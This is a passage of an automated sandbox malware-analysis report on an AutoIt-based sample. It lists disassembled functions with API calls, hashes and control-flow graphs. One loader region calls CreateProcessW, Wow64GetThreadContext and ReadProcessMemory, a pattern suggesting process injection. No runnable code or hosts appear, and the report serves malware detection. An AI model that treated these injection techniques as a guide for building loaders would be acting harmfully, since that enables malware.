                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                          • String ID:
                                                                                          • API String ID: 3886058894-0
                                                                                          • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                          • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                                          • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                          • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99
                                                                                          Function 00401BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90windowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1546 401be0-401bf5 1547 401bfb-401c12 call 4013a0 1546->1547 1548 401cde-401ce3 1546->1548 1551 42a9a0-42a9b0 LoadStringW 1547->1551 1552 401c18-401c34 call 4021e0 1547->1552 1555 42a9bb-42a9c8 call 40df50 1551->1555 1557 401c3a-401c3e 1552->1557 1558 42a9cd-42a9ea call 40d3b0 call 437a81 1552->1558 1562 401c53-401cd9 call 4131f0 call 41326a call 411691 Shell_NotifyIconW call 402620 1555->1562 1557->1555 1560 401c44-401c4e call 40d3b0 1557->1560 1558->1562 1570 42a9f0-42aa04 call 40d3b0 call 437a81 1558->1570 1560->1562 1562->1548
                                                                                          APIs
                                                                                          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • _memset.LIBCMT ref: 00401C62
                                                                                          • _wcsncpy.LIBCMT ref: 00401CA1
                                                                                          • _wcscpy.LIBCMT ref: 00401CBD
                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                          • String ID: Line:
                                                                                          • API String ID: 1620655955-1585850449
                                                                                          • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                          • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                          • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                          • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                                          Function 004103E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1579 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                          • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                          • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateShow
                                                                                          • String ID: AutoIt v3$edit
                                                                                          • API String ID: 1584632944-3779509399
                                                                                          • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                          • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                          • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                          • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                                                                                          Function 040E5E60 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1580 40e5e60-40e5f85 call 40e3ab0 call 40e5d50 CreateFileW 1587 40e5f8c-40e5f9c 1580->1587 1588 40e5f87 1580->1588 1591 40e5f9e 1587->1591 1592 40e5fa3-40e5fbd VirtualAlloc 1587->1592 1589 40e603c-40e6041 1588->1589 1591->1589 1593 40e5fbf 1592->1593 1594 40e5fc1-40e5fd8 ReadFile 1592->1594 1593->1589 1595 40e5fdc-40e6016 call 40e5d90 call 40e4d50 1594->1595 1596 40e5fda 1594->1596 1601 40e6018-40e602d call 40e5de0 1595->1601 1602 40e6032-40e603a ExitProcess 1595->1602 1596->1589 1601->1602 1602->1589
                                                                                          APIs
                                                                                            • Part of subcall function 040E5D50: Sleep.KERNELBASE(000001F4), ref: 040E5D61
                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040E5F7B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFileSleep
                                                                                          • String ID: 4QHVKI9OX6
                                                                                          • API String ID: 2694422964-646440272
                                                                                          • Opcode ID: 81b89d58bc279ea081a69ad5cbf2466cfb8b88e4dfaad5ba2c0efd62c36e63f7
                                                                                          • Instruction ID: bc3e4ffd77de1c0122be9cb08d3e0771e83628bb09ea5b1c12d7a7a9f1eccca5
                                                                                          • Opcode Fuzzy Hash: 81b89d58bc279ea081a69ad5cbf2466cfb8b88e4dfaad5ba2c0efd62c36e63f7
                                                                                          • Instruction Fuzzy Hash: 66518E30D04248EBEF14DBE4D814BEFBB79AF58304F004599E608BB2C0DA796B44CBA5
                                                                                          Function 00413A88 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __lock.LIBCMT ref: 00413AA6
                                                                                            • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                            • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                            • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                          • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                          • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                          • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                          • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                          • String ID:
                                                                                          • API String ID: 2714421763-0
                                                                                          • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                          • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                          • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                          • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                                          Function 004734B7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 234COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Wu
                                                                                          • API String ID: 0-4083010176
                                                                                          • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                          • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                          • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                          • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                          Function 0040F5E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                            • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                            • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                                          • _strcat.LIBCMT ref: 0040F603
                                                                                            • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                            • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                          • String ID: HH
                                                                                          • API String ID: 1194219731-2761332787
                                                                                          • Opcode ID: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
                                                                                          • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                          • Opcode Fuzzy Hash: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
                                                                                          • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                          Function 040E4D50 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 040E550B
                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040E55A1
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040E55C3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 2438371351-0
                                                                                          • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                          • Instruction ID: a5f8423348b212de0c7ef67028bab4079f442be720f6b68d013472e58747c1c9
                                                                                          • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                          • Instruction Fuzzy Hash: 72621B30A14258DBEB24CFA4CC50BEEB376EF58304F1095A9D10DFB290E675AE91CB59
                                                                                          Function 0040E1E0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 0040E202
                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell__memset
                                                                                          • String ID:
                                                                                          • API String ID: 928536360-0
                                                                                          • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                          • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                          • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                          • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                          Function 0041171A Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 00411734
                                                                                            • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                            • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                            • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                          • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 1411284514-0
                                                                                          • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                          • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                                          • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                          • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                          Function 0040F110 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                          • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3677997916-0
                                                                                          • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                          • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                          • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                          • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                          Function 0043526E Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 00435278
                                                                                            • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                            • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                            • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                          • _malloc.LIBCMT ref: 00435288
                                                                                          • _malloc.LIBCMT ref: 00435298
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _malloc$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 680241177-0
                                                                                          • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                          • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                          • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                          • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                                          Function 00401B70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 00401B71
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                          • String ID: @EXITCODE
                                                                                          • API String ID: 580348202-3436989551
                                                                                          • Opcode ID: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
                                                                                          • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                                          • Opcode Fuzzy Hash: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
                                                                                          • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                                          Function 0040EFE0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                          • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                          • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                          • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                          Function 0041511A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
